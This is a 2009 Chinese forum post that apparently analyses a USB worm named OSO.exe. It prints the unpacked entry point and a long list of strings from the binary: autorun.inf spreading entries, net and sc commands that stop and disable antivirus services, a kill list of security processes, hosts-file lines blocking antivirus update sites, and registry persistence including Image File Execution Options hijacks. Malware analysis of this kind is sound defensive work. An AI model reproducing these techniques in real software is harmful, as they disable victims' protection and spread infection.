
2000gaobo 发表于 2009-1-24 17:31

.[U盘感染者]-

.[U盘感染者]-
1.OEP:
有壳，但壳比较简单。

oep:
0040C231 55 push ebp
0040C232 8BEC mov ebp,esp
0040C234 B9 29000000 mov ecx,29
0040C239 6A 00 push 0
0040C23B 6A 00 push 0
0040C23D 49 dec ecx
0040C23E ^ 75 F9 jnz short OSO.0040C239
0040C240 51 push ecx
0040C241 53 push ebx
0040C242 56 push esi
0040C243 57 push edi
0040C244 B8 A1C14000 mov eax,OSO.0040C1A1
0040C249 E8 0782FFFF call OSO.00404455
0040C24E 8B1D 2CD14000 mov ebx,dword ptr ds:[40D12C] ; OSO.0040EED4
0040C254 8B35 DCD04000 mov esi,dword ptr ds:[40D0DC] ; OSO.0040EF48

2.文本字符串参考位于 OSO:.text
地址 反汇编 文本字符串
00404C75 mov edx,OSO.00404DA5 ASCII "hx1.bat"
00404C95 mov edx,OSO.00404DB5 ASCII "@echo off"
00404CC2 mov edx,OSO.00404DA5 ASCII "hx1.bat"
00404CE2 mov edx,OSO.00404DC9 ASCII "set date=2004-1-22"
00404CF8 mov edx,OSO.00404DE5 ASCII "ping ** localhost > nul"
00404D0E mov edx,OSO.00404E05 ASCII "date %date%"
00404D24 mov edx,OSO.00404E19 ASCII "del %0"
00404D57 mov edx,OSO.00404DA5 ASCII "hx1.bat"
00404D6A push OSO.00404E21 ASCII "open"
004052ED push OSO.00405339 ASCII "kernel32.dll"
00405305 push OSO.00405349 ASCII "RegisterServiceProcess"
004057C2 mov eax,OSO.0040598D ASCII "lqrs>*)tsr(``642*kcw+66t*q~w"
004057EF mov eax,OSO.004059B5 ASCII "`tn{5+r{p"
00405909 mov eax,OSO.004059C9 ASCII "A}vokwcq*`~f"
0040591F mov eax,OSO.004059E1 ASCII "kucm"
00405A14 mov eax,OSO.00405DC9 ASCII "lqrs>*)tsr(`ps757+eli*ggilh,`jqm*q~w"
00405A41 mov eax,OSO.00405DF9 ASCII "`tn{7+r{p"
00405C59 push OSO.00405E0D ASCII "new"
00405CD3 push OSO.00405E0D ASCII "new"
00405D03 mov eax,OSO.00405E19 ASCII "kucm"
00405D68 push OSO.00405E0D ASCII "new"
00405E9E mov ecx,OSO.004061E1 ASCII "\autorun.inf"
00405EBA mov ecx,OSO.004061F9 ASCII "OSO.exe"
00405EFB mov ecx,OSO.004061E1 ASCII "\autorun.inf"
00405F1E mov ecx,OSO.004061F9 ASCII "OSO.exe"
00405F3C mov ecx,OSO.004061E1 ASCII "\autorun.inf"
00405F5A mov ecx,OSO.004061F9 ASCII "OSO.exe"
00405FE3 mov ecx,OSO.004061F9 ASCII "OSO.exe"
0040609F mov ecx,OSO.004061E1 ASCII "\autorun.inf"
004060C4 mov edx,OSO.00406239 ASCII "[AutoRun]"
004060E7 mov ecx,OSO.004061E1 ASCII "\autorun.inf"
0040610C mov edx,OSO.0040624D ASCII "open=OSO.exe"
00406122 mov edx,OSO.00406265 ASCII "shellexecute=OSO.exe"
00406138 mov edx,OSO.00406285 ASCII "shell\Auto\command=OSO.exe"
0040615D mov ecx,OSO.004061F9 ASCII "OSO.exe"
0040617D mov ecx,OSO.004061E1 ASCII "\autorun.inf"
0040630F mov ecx,OSO.00406585 ASCII "\autorun.inf"
0040632B mov ecx,OSO.0040659D ASCII "OSO.exe"
00406350 mov ecx,OSO.00406585 ASCII "\autorun.inf"
00406373 mov ecx,OSO.0040659D ASCII "OSO.exe"
00406391 mov ecx,OSO.00406585 ASCII "\autorun.inf"
004063AF mov ecx,OSO.0040659D ASCII "OSO.exe"
00406407 mov ecx,OSO.0040659D ASCII "OSO.exe"
00406432 mov ecx,OSO.00406585 ASCII "\autorun.inf"
00406460 mov edx,OSO.004065AD ASCII "[AutoRun]"
00406486 mov ecx,OSO.00406585 ASCII "\autorun.inf"
004064B4 mov edx,OSO.004065C1 ASCII "open=OSO.exe"
004064CD mov edx,OSO.004065D9 ASCII "shellexecute=OSO.exe"
004064E6 mov edx,OSO.004065F9 ASCII "shell\Auto\command=OSO.exe"
0040650E mov ecx,OSO.0040659D ASCII "OSO.exe"
0040652E mov ecx,OSO.00406585 ASCII "\autorun.inf"
00406683 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
0040669F mov ecx,OSO.00406911 ASCII "OSO.exe"
004066C4 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
004066E7 mov ecx,OSO.00406911 ASCII "OSO.exe"
00406705 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
00406723 mov ecx,OSO.00406911 ASCII "OSO.exe"
0040677B mov ecx,OSO.00406911 ASCII "OSO.exe"
004067A6 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
004067D4 mov edx,OSO.00406921 ASCII "[AutoRun]"
004067FA mov ecx,OSO.004068F9 ASCII "\autorun.inf"
00406828 mov edx,OSO.00406935 ASCII "open=OSO.exe"
00406841 mov edx,OSO.0040694D ASCII "shellexecute=OSO.exe"
0040685A mov edx,OSO.0040696D ASCII "shell\Auto\command=OSO.exe"
00406882 mov ecx,OSO.00406911 ASCII "OSO.exe"
004068A2 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
004069F7 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406A13 mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406A38 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406A5B mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406A79 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406A97 mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406AEF mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406B1A mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406B48 mov edx,OSO.00406C95 ASCII "[AutoRun]"
00406B6E mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406B9C mov edx,OSO.00406CA9 ASCII "open=OSO.exe"
00406BB5 mov edx,OSO.00406CC1 ASCII "shellexecute=OSO.exe"
00406BCE mov edx,OSO.00406CE1 ASCII "shell\Auto\command=OSO.exe"
00406BF6 mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406C16 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406D6B mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406D87 mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406DAC mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406DCF mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406DED mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406E0B mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406E63 mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406E8E mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406EBC mov edx,OSO.00407009 ASCII "[AutoRun]"
00406EE2 mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406F10 mov edx,OSO.0040701D ASCII "open=OSO.exe"
00406F29 mov edx,OSO.00407035 ASCII "shellexecute=OSO.exe"
00406F42 mov edx,OSO.00407055 ASCII "shell\Auto\command=OSO.exe"
00406F6A mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406F8A mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
004070DF mov ecx,OSO.00407355 ASCII "\autorun.inf"
004070FB mov ecx,OSO.0040736D ASCII "OSO.exe"
00407120 mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407143 mov ecx,OSO.0040736D ASCII "OSO.exe"
00407161 mov ecx,OSO.00407355 ASCII "\autorun.inf"
0040717F mov ecx,OSO.0040736D ASCII "OSO.exe"
004071D7 mov ecx,OSO.0040736D ASCII "OSO.exe"
00407202 mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407230 mov edx,OSO.0040737D ASCII "[AutoRun]"
00407256 mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407284 mov edx,OSO.00407391 ASCII "open=OSO.exe"
0040729D mov edx,OSO.004073A9 ASCII "shellexecute=OSO.exe"
004072B6 mov edx,OSO.004073C9 ASCII "shell\Auto\command=OSO.exe"
004072DE mov ecx,OSO.0040736D ASCII "OSO.exe"
004072FE mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407453 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
0040746F mov ecx,OSO.004076E1 ASCII "OSO.exe"
00407494 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004074B7 mov ecx,OSO.004076E1 ASCII "OSO.exe"
004074D5 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004074F3 mov ecx,OSO.004076E1 ASCII "OSO.exe"
0040754B mov ecx,OSO.004076E1 ASCII "OSO.exe"
00407576 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004075A4 mov edx,OSO.004076F1 ASCII "[AutoRun]"
004075CA mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004075F8 mov edx,OSO.00407705 ASCII "open=OSO.exe"
00407611 mov edx,OSO.0040771D ASCII "shellexecute=OSO.exe"
0040762A mov edx,OSO.0040773D ASCII "shell\Auto\command=OSO.exe"
00407652 mov ecx,OSO.004076E1 ASCII "OSO.exe"
00407672 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004077A0 mov eax,OSO.00407AAD ASCII "D&" *mrn"
0040781C mov eax,OSO.00407AC1 ASCII "lqrs>*)tsr(``642*fin"
00407835 mov eax,OSO.00407AE1 ASCII "lqrs>*)tsr(``642*kcw"
0040784E mov eax,OSO.00407B01 ASCII "lqrs>*)tsr(532?43+eli"
00407867 mov eax,OSO.00407B21 ASCII "lqrs>*)tsr(`ps757+eli"
00407880 mov eax,OSO.00407B21 ASCII "lqrs>*)tsr(`ps757+eli"
004078A3 mov eax,OSO.00407AAD ASCII "D&" *mrn"
004078DC mov eax,OSO.00407B41 ASCII "8CTBI@UFP;"
00407922 mov eax,OSO.00407AAD ASCII "D&" *mrn"
0040795B mov eax,OSO.00407B55 ASCII "8CTBI@&pvf;!"
0040796E mov eax,OSO.00407B6D ASCII "&;"
004079A9 mov eax,OSO.00407B79 ASCII "8*@QEHCPAQ8"
00407A39 mov eax,OSO.00407B8D ASCII "A}vokwcq*`~f"
00407A4F mov eax,OSO.00407BA5 ASCII "kucm"
00407C24 mov edx,OSO.00408101 ASCII "severe.exe"
004082F6 push OSO.004086E5 ASCII "stop srservice"
004082FB push OSO.004086F5 ASCII "net.exe"
00408300 push OSO.004086FD ASCII "open"
00408310 push OSO.00408705 ASCII "config srservice start= disabled"
00408315 push OSO.00408729 ASCII "sc.exe"
0040831A push OSO.004086FD ASCII "open"
0040832A push OSO.00408731 ASCII "stop sharedaccess"
0040832F push OSO.004086F5 ASCII "net.exe"
00408334 push OSO.004086FD ASCII "open"
00408344 push OSO.00408745 ASCII "stop KVWSC"
00408349 push OSO.004086F5 ASCII "net.exe"
0040834E push OSO.004086FD ASCII "open"
0040835E push OSO.00408751 ASCII "config KVWSC start= disabled"
00408363 push OSO.00408729 ASCII "sc.exe"
00408368 push OSO.004086FD ASCII "open"
00408378 push OSO.00408771 ASCII "stop KVSrvXP"
0040837D push OSO.004086F5 ASCII "net.exe"
00408382 push OSO.004086FD ASCII "open"
00408392 push OSO.00408781 ASCII "config KVSrvXP start= disabled"
00408397 push OSO.00408729 ASCII "sc.exe"
0040839C push OSO.004086FD ASCII "open"
004083AC push OSO.004087A1 ASCII "stop kavsvc"
004083B1 push OSO.004086F5 ASCII "net.exe"
004083B6 push OSO.004086FD ASCII "open"
004083C6 push OSO.004087AD ASCII "config kavsvc start= disabled"
004083CB push OSO.00408729 ASCII "sc.exe"
004083D0 push OSO.004086FD ASCII "open"
004083E0 push OSO.004087CD ASCII "config RsRavMon start= disabled"
004083E5 push OSO.00408729 ASCII "sc.exe"
004083EA push OSO.004086FD ASCII "open"
004083FA push OSO.004087ED ASCII "stop RsCCenter"
004083FF push OSO.004086F5 ASCII "net.exe"
00408404 push OSO.004086FD ASCII "open"
00408414 push OSO.004087FD ASCII "config RsCCenter start= disabled"
00408419 push OSO.00408729 ASCII "sc.exe"
0040841E push OSO.004086FD ASCII "open"
0040842E push OSO.00408821 ASCII "stop RsRavMon"
00408433 push OSO.004086F5 ASCII "net.exe"
00408438 push OSO.004086FD ASCII "open"
00408453 push OSO.0040883D ASCII "#32770"
00408462 push OSO.0040884D ASCII "Button"
00408482 mov eax,OSO.0040885D ASCII "sc.exe"
0040848C mov eax,OSO.0040886D ASCII "cmd.exe"
00408496 mov eax,OSO.0040887D ASCII "net.exe"
004084A0 mov eax,OSO.0040888D ASCII "sc1.exe"
004084AA mov eax,OSO.0040889D ASCII "net1.exe"
004084B4 mov eax,OSO.004088B1 ASCII "PFW.exe"
004084BE mov eax,OSO.004088C1 ASCII "Kav.exe"
004084C8 mov eax,OSO.004088D1 ASCII "KVOL.exe"
004084D2 mov eax,OSO.004088E5 ASCII "KVFW.exe"
004084DC mov eax,OSO.004088F9 ASCII "adam.exe"
004084E6 mov eax,OSO.0040890D ASCII "qqav.exe"
004084F0 mov eax,OSO.00408921 ASCII "qqkav.exe"
004084FA mov eax,OSO.00408935 ASCII "TBMon.exe"
00408504 mov eax,OSO.00408949 ASCII "kav32.exe"
0040850E mov eax,OSO.0040895D ASCII "kvwsc.exe"
00408518 mov eax,OSO.00408971 ASCII "CCAPP.exe"
00408522 mov eax,OSO.00408985 ASCII "KRegEx.exe"
0040852C mov eax,OSO.00408999 ASCII "kavsvc.exe"
00408536 mov eax,OSO.004089AD ASCII "VPTray.exe"
00408540 mov eax,OSO.004089C1 ASCII "RAVMON.exe"
0040854A mov eax,OSO.004089D5 ASCII "EGHOST.exe"
00408554 mov eax,OSO.004089E9 ASCII "KavPFW.exe"
0040855E mov eax,OSO.004089FD ASCII "SHSTAT.exe"
00408568 mov eax,OSO.00408A11 ASCII "RavTask.exe"
00408572 mov eax,OSO.00408A25 ASCII "TrojDie.kxp"
0040857C mov eax,OSO.00408A39 ASCII "Iparmor.exe"
00408586 mov eax,OSO.00408A4D ASCII "MAILMON.exe"
00408590 mov eax,OSO.00408A61 ASCII "MCAGENT.exe"
0040859A mov eax,OSO.00408A75 ASCII "KAVPLUS.exe"
004085A4 mov eax,OSO.00408A89 ASCII "RavMonD.exe"
004085AE mov eax,OSO.00408A9D ASCII "Rtvscan.exe"
004085B8 mov eax,OSO.00408AB1 ASCII "Nvsvc32.exe"
004085C2 mov eax,OSO.00408AC5 ASCII "KVMonXP.exe"
004085CC mov eax,OSO.00408AD9 ASCII "Kvsrvxp.exe"
004085D6 mov eax,OSO.00408AED ASCII "CCenter.exe"
004085E0 mov eax,OSO.00408B01 ASCII "KpopMon.exe"
004085EA mov eax,OSO.00408B15 ASCII "RfwMain.exe"
004085F4 mov eax,OSO.00408B29 ASCII "KWATCHUI.exe"
004085FE mov eax,OSO.00408B41 ASCII "MCVSESCN.exe"
00408608 mov eax,OSO.00408B59 ASCII "MSKAGENT.exe"
00408612 mov eax,OSO.00408B71 ASCII "kvolself.exe"
0040861C mov eax,OSO.00408B89 ASCII "KVCenter.kxp"
00408626 mov eax,OSO.00408BA1 ASCII "kavstart.exe"
00408630 mov eax,OSO.00408BB9 ASCII "RAVTIMER.exe"
0040863A mov eax,OSO.00408BD1 ASCII "RRfwMain.exe"
00408644 mov eax,OSO.00408BE9 ASCII "FireTray.exe"
0040864E mov eax,OSO.00408C01 ASCII "UpdaterUI.exe"
00408658 mov eax,OSO.00408C19 ASCII "KVSrvXp_1.exe"
00408662 mov eax,OSO.00408C31 ASCII "RavService.exe"
00408C70 mov ecx,OSO.004090D9 ASCII "drivers\etc\"
00408C90 mov ecx,OSO.004090F1 ASCII "hosts"
00408CAE mov ecx,OSO.004090F1 ASCII "hosts"
00408CCC mov ecx,OSO.004090F1 ASCII "hosts"
00408CF6 mov edx,OSO.004090F9 ASCII "127.0.0.1 localhost"
00408D1B mov ecx,OSO.004090F1 ASCII "hosts"
00408D45 mov edx,OSO.00409115 ASCII "127.0.0.1 mmsk.cn"
00408D5B mov edx,OSO.0040912D ASCII "127.0.0.1 ikaka.com"
00408D71 mov edx,OSO.00409149 ASCII "127.0.0.1 safe.qq.com"
00408D87 mov edx,OSO.00409165 ASCII "127.0.0.1 360safe.com"
00408D9D mov edx,OSO.00409181 ASCII "127.0.0.1 [url=http://www.mmsk.cn]www.mmsk.cn[/url]"
00408DB3 mov edx,OSO.0040919D ASCII "127.0.0.1 [url=http://www.ikaka.com]www.ikaka.com[/url]"
00408DC9 mov edx,OSO.004091BD ASCII "127.0.0.1 tool.ikaka.com"
00408DDF mov edx,OSO.004091DD ASCII "127.0.0.1 [url=http://www.360safe.com]www.360safe.com[/url]"
00408DF5 mov edx,OSO.004091FD ASCII "127.0.0.1 zs.kingsoft.com"
00408E0B mov edx,OSO.0040921D ASCII "127.0.0.1 forum.ikaka.com"
00408E21 mov edx,OSO.0040923D ASCII "127.0.0.1 up.rising.com.cn"
00408E37 mov edx,OSO.00409261 ASCII "127.0.0.1 scan.kingsoft.com"
00408E4D mov edx,OSO.00409285 ASCII "127.0.0.1 kvup.jiangmin.com"
00408E63 mov edx,OSO.004092A9 ASCII "127.0.0.1 reg.rising.com.cn"
00408E79 mov edx,OSO.004092CD ASCII "127.0.0.1 update.rising.com.cn"
00408E8F mov edx,OSO.004092F5 ASCII "127.0.0.1 update7.jiangmin.com"
00408EA5 mov edx,OSO.0040931D ASCII "127.0.0.1 download.rising.com.cn"
00408EBB mov edx,OSO.00409345 ASCII "127.0.0.1 dnl-us1.kaspersky-labs.com"
00408ED1 mov edx,OSO.00409371 ASCII "127.0.0.1 dnl-us2.kaspersky-labs.com"
00408EE7 mov edx,OSO.0040939D ASCII "127.0.0.1 dnl-us3.kaspersky-labs.com"
00408EFD mov edx,OSO.004093C9 ASCII "127.0.0.1 dnl-us4.kaspersky-labs.com"
00408F13 mov edx,OSO.004093F5 ASCII "127.0.0.1 dnl-us5.kaspersky-labs.com"
00408F29 mov edx,OSO.00409421 ASCII "127.0.0.1 dnl-us6.kaspersky-labs.com"
00408F3F mov edx,OSO.0040944D ASCII "127.0.0.1 dnl-us7.kaspersky-labs.com"
00408F55 mov edx,OSO.00409479 ASCII "127.0.0.1 dnl-us8.kaspersky-labs.com"
00408F6B mov edx,OSO.004094A5 ASCII "127.0.0.1 dnl-us9.kaspersky-labs.com"
00408F81 mov edx,OSO.004094D1 ASCII "127.0.0.1 dnl-us10.kaspersky-labs.com"
00408F97 mov edx,OSO.004094FD ASCII "127.0.0.1 dnl-eu1.kaspersky-labs.com"
00408FAD mov edx,OSO.00409529 ASCII "127.0.0.1 dnl-eu2.kaspersky-labs.com"
00408FC3 mov edx,OSO.00409555 ASCII "127.0.0.1 dnl-eu3.kaspersky-labs.com"
00408FD9 mov edx,OSO.00409581 ASCII "127.0.0.1 dnl-eu4.kaspersky-labs.com"
00408FEF mov edx,OSO.004095AD ASCII "127.0.0.1 dnl-eu5.kaspersky-labs.com"
00409005 mov edx,OSO.004095D9 ASCII "127.0.0.1 dnl-eu6.kaspersky-labs.com"
0040901B mov edx,OSO.00409605 ASCII "127.0.0.1 dnl-eu7.kaspersky-labs.com"
00409031 mov edx,OSO.00409631 ASCII "127.0.0.1 dnl-eu8.kaspersky-labs.com"
00409047 mov edx,OSO.0040965D ASCII "127.0.0.1 dnl-eu9.kaspersky-labs.com"
0040905D mov edx,OSO.00409689 ASCII "127.0.0.1 dnl-eu10.kaspersky-labs.com"
0040908E mov ecx,OSO.004090F1 ASCII "hosts"
004096E0 mov edx,OSO.0040986D ASCII "noruns.reg"
00409703 mov edx,OSO.0040986D ASCII "noruns.reg"
00409725 mov edx,OSO.00409881 ASCII "Windows Registry Editor Version 5.00"
00409750 mov edx,OSO.0040986D ASCII "noruns.reg"
00409785 mov edx,OSO.004098B1 ASCII "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
0040979B mov edx,OSO.00409909 ASCII ""NoDriveTypeAutoRun"=dword:b5"
004097C9 push OSO.00409931 ASCII " /s "
004097D9 push OSO.0040986D ASCII "noruns.reg"
004097F4 push OSO.00409939 ASCII "regedit.exe"
004097F9 push OSO.00409945 ASCII "open"
0040980F mov eax,OSO.00409955 ASCII "regedit.exe"
00409824 mov edx,OSO.0040986D ASCII "noruns.reg"
0040998C mov eax,OSO.004099AD ASCII "QQ.exe"
004099BE push OSO.00409AAD ASCII "#32770"
00409B12 push OSO.0040A469 ASCII ".exe"
00409B38 mov edx,OSO.0040A471 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00409B52 mov edx,OSO.0040A4A9 ASCII "severe.exe"
00409B75 mov edx,OSO.0040A471 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00409B84 push OSO.0040A4BD ASCII "Explorer.exe "
00409B94 push OSO.0040A4D5 ASCII "drivers\"
00409B99 push OSO.0040A4E9 ASCII "conime.exe"
00409BB6 mov ecx,OSO.0040A4F5 ASCII "Shell"
00409BBB mov edx,OSO.0040A4FD ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
00409BD1 mov ecx,OSO.0040A539 ASCII "CheckedValue"
00409BD6 mov edx,OSO.0040A549 ASCII "software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall"
00409BF0 push OSO.0040A4D5 ASCII "drivers\"
00409BF7 push OSO.0040A469 ASCII ".exe"
00409C14 mov ecx,OSO.0040A59D ASCII "Debugger"
00409C19 mov edx,OSO.0040A5A9 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe"
00409C33 push OSO.0040A4D5 ASCII "drivers\"
00409C3A push OSO.0040A469 ASCII ".exe"
00409C57 mov ecx,OSO.0040A59D ASCII "Debugger"
00409C5C mov edx,OSO.0040A601 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe"
00409C76 push OSO.0040A4D5 ASCII "drivers\"
00409C7D push OSO.0040A469 ASCII ".exe"
00409C9A mov ecx,OSO.0040A59D ASCII "Debugger"
00409C9F mov edx,OSO.0040A655 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com"
00409CB9 push OSO.0040A4D5 ASCII "drivers\"
00409CC0 push OSO.0040A469 ASCII ".exe"
00409CDD mov ecx,OSO.0040A59D ASCII "Debugger"
00409CE2 mov edx,OSO.0040A6A9 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe"
00409CFC push OSO.0040A4D5 ASCII "drivers\"
00409D03 push OSO.0040A469 ASCII ".exe"
00409D20 mov ecx,OSO.0040A59D ASCII "Debugger"
00409D25 mov edx,OSO.0040A6FD ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe"
00409D3F push OSO.0040A4D5 ASCII "drivers\"
00409D46 push OSO.0040A469 ASCII ".exe"
00409D63 mov ecx,OSO.0040A59D ASCII "Debugger"
00409D68 mov edx,OSO.0040A755 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe"
00409D82 push OSO.0040A4D5 ASCII "drivers\"
00409D89 push OSO.0040A469 ASCII ".exe"
00409DA6 mov ecx,OSO.0040A59D ASCII "Debugger"
00409DAB mov edx,OSO.0040A7AD ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp"
00409DC5 push OSO.0040A4D5 ASCII "drivers\"
00409DCC push OSO.0040A469 ASCII ".exe"
00409DE9 mov ecx,OSO.0040A59D ASCII "Debugger"
00409DEE mov edx,OSO.0040A801 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp"
00409E08 push OSO.0040A4D5 ASCII "drivers\"
00409E0F push OSO.0040A469 ASCII ".exe"
00409E2C mov ecx,OSO.0040A59D ASCII "Debugger"
00409E31 mov edx,OSO.0040A859 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp"
00409E4B push OSO.0040A4D5 ASCII "drivers\"
00409E52 push OSO.0040A469 ASCII ".exe"
00409E6F mov ecx,OSO.0040A59D ASCII "Debugger"
00409E74 mov edx,OSO.0040A8B1 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe"
00409E8E push OSO.0040A4D5 ASCII "drivers\"
00409E95 push OSO.0040A469 ASCII ".exe"
00409EB2 mov ecx,OSO.0040A59D ASCII "Debugger"
00409EB7 mov edx,OSO.0040A909 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe"
00409ED1 push OSO.0040A4D5 ASCII "drivers\"
00409ED8 push OSO.0040A469 ASCII ".exe"
00409EF5 mov ecx,OSO.0040A59D ASCII "Debugger"
00409EFA mov edx,OSO.0040A95D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe"
00409F14 push OSO.0040A4D5 ASCII "drivers\"
00409F1B push OSO.0040A469 ASCII ".exe"
00409F38 mov ecx,OSO.0040A59D ASCII "Debugger"
00409F3D mov edx,OSO.0040A9B9 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe"
00409F5D push OSO.0040A4D5 ASCII "drivers\"
00409F64 push OSO.0040A469 ASCII ".exe"
00409F81 mov ecx,OSO.0040A59D ASCII "Debugger"
00409F86 mov edx,OSO.0040AA11 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe"
00409FA6 push OSO.0040A4D5 ASCII "drivers\"
00409FAD push OSO.0040A469 ASCII ".exe"
00409FD0 mov ecx,OSO.0040A59D ASCII "Debugger"
00409FD5 mov edx,OSO.0040AA69 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe"
00409FF5 push OSO.0040A4D5 ASCII "drivers\"
00409FFC push OSO.0040A469 ASCII ".exe"
0040A01F mov ecx,OSO.0040A59D ASCII "Debugger"
0040A024 mov edx,OSO.0040AAC1 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe"
0040A044 push OSO.0040A4D5 ASCII "drivers\"
0040A04B push OSO.0040A469 ASCII ".exe"
0040A06E mov ecx,OSO.0040A59D ASCII "Debugger"
0040A073 mov edx,OSO.0040AB19 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe"
0040A093 push OSO.0040A4D5 ASCII "drivers\"
0040A09A push OSO.0040A469 ASCII ".exe"
0040A0BD mov ecx,OSO.0040A59D ASCII "Debugger"
0040A0C2 mov edx,OSO.0040AB6D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe"
0040A0E2 push OSO.0040A4D5 ASCII "drivers\"
0040A0E9 push OSO.0040A469 ASCII ".exe"
0040A10C mov ecx,OSO.0040A59D ASCII "Debugger"
0040A111 mov edx,OSO.0040ABC5 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe"
0040A131 push OSO.0040A4D5 ASCII "drivers\"
0040A138 push OSO.0040A469 ASCII ".exe"
0040A15B mov ecx,OSO.0040A59D ASCII "Debugger"
0040A160 mov edx,OSO.0040AC1D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE"
0040A180 push OSO.0040A4D5 ASCII "drivers\"
0040A187 push OSO.0040A469 ASCII ".exe"
0040A1AA mov ecx,OSO.0040A59D ASCII "Debugger"
0040A1AF mov edx,OSO.0040AC71 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe"
0040A1CF push OSO.0040A4D5 ASCII "drivers\"
0040A1D6 push OSO.0040A469 ASCII ".exe"
0040A1F9 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A1FE mov edx,OSO.0040ACC5 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe"
0040A21E push OSO.0040A4D5 ASCII "drivers\"
0040A225 push OSO.0040A469 ASCII ".exe"
0040A248 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A24D mov edx,OSO.0040AD1D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe"
0040A26D push OSO.0040A4D5 ASCII "drivers\"
0040A274 push OSO.0040A469 ASCII ".exe"
0040A297 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A29C mov edx,OSO.0040AD75 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com"
0040A2BC push OSO.0040A4D5 ASCII "drivers\"
0040A2C3 push OSO.0040A469 ASCII ".exe"
0040A2E6 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A2EB mov edx,OSO.0040ADCD ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com"
0040A30B push OSO.0040A4D5 ASCII "drivers\"
0040A312 push OSO.0040A469 ASCII ".exe"
0040A335 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A33A mov edx,OSO.0040AE25 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe"
0040A35A push OSO.0040A4D5 ASCII "drivers\"
0040A361 push OSO.0040A469 ASCII ".exe"
0040A384 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A389 mov edx,OSO.0040AE79 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe"
0040A3A9 push OSO.0040A4D5 ASCII "drivers\"
0040A3B0 push OSO.0040A469 ASCII ".exe"
0040A3D3 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A3D8 mov edx,OSO.0040AED5 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe"
0040A3F8 push OSO.0040A4D5 ASCII "drivers\"
